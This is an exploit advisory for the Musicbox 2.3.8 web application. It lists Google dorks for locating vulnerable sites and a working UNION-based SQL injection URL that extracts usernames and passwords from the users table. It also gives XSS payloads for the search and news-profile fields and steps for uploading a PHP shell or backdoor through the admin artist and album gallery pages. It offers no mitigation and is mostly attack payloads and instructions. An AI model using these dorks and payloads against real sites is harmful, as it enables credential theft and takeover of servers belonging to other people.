105 lines
No EOL
2.5 KiB
Text
105 lines
No EOL
2.5 KiB
Text
#Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities
|
|
#Author : DevilScreaM
|
|
#Date : 25/08/2013
|
|
#Category : Web Applications
|
|
#Vendor : http://www.musicboxv2.com/
|
|
#Version : 1.0 - 2.3.8
|
|
|
|
#Dork
|
|
intext:Musicbox Version
|
|
intext:Musicbox Version 2.3.8 © 2008
|
|
inurl:genre_albums.php?id=
|
|
|
|
#Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability
|
|
#Tested On : Windows 7 32 Bit (Mozila & Chrome)
|
|
#Greetz : Newbie-Security.or.id
|
|
|
|
|
|
SQL Injection Vulnerability
|
|
|
|
http://site-target/genre_albums.php?id=[SQLI]
|
|
|
|
Example
|
|
http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
|
|
|
|
==========================================================================================
|
|
|
|
Cross site scripting / XSS Vulnerability
|
|
|
|
*Search
|
|
|
|
1. Go To Fiture Search
|
|
|
|
2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search
|
|
|
|
3. See Result
|
|
|
|
or See with URL
|
|
|
|
http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0
|
|
|
|
Example
|
|
|
|
http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0
|
|
|
|
|
|
========================================================================================
|
|
|
|
*News Profile
|
|
|
|
1. Register To Website or go to link http://site-target/register.php
|
|
|
|
2. Login to Website
|
|
|
|
3. Go to Menu [ My News ]
|
|
|
|
4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>
|
|
|
|
And at Detials input your XSS or Text
|
|
|
|
See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]
|
|
|
|
Example
|
|
|
|
http://server/musicbox/member.php?uname=devilscream
|
|
|
|
|
|
==========================================================================================
|
|
|
|
Shell Upload Vulnerability
|
|
|
|
*Artist Galery
|
|
|
|
1. Go to Admin Page, And Login
|
|
|
|
2. Go to Upload Artist Image or Go to Link
|
|
|
|
http://site-target/admin/adminpanel.php?action=artistgallery
|
|
|
|
3. Select Your Shell/Backdoor , And Click Submit
|
|
|
|
4. Result Upload At
|
|
|
|
http://site-target/artist_gallery/Your_Backdoor.php
|
|
|
|
|
|
============================================================================================
|
|
|
|
*Album Galery
|
|
|
|
1. Go to Admin Page, And Login
|
|
|
|
2. Go to Upload Album Image or Go to Link
|
|
|
|
http://site-target/admin/adminpanel.php?action=albumgallery
|
|
|
|
3. Select Option, Example Option "All Album", And Click Submit
|
|
|
|
3. Select Your Shell/Backdoor , And Click Submit
|
|
|
|
4. Result Upload At
|
|
|
|
http://site-target/album_gallery/Your_Backdoor.php
|
|
|
|
|
|
========================================================================================== |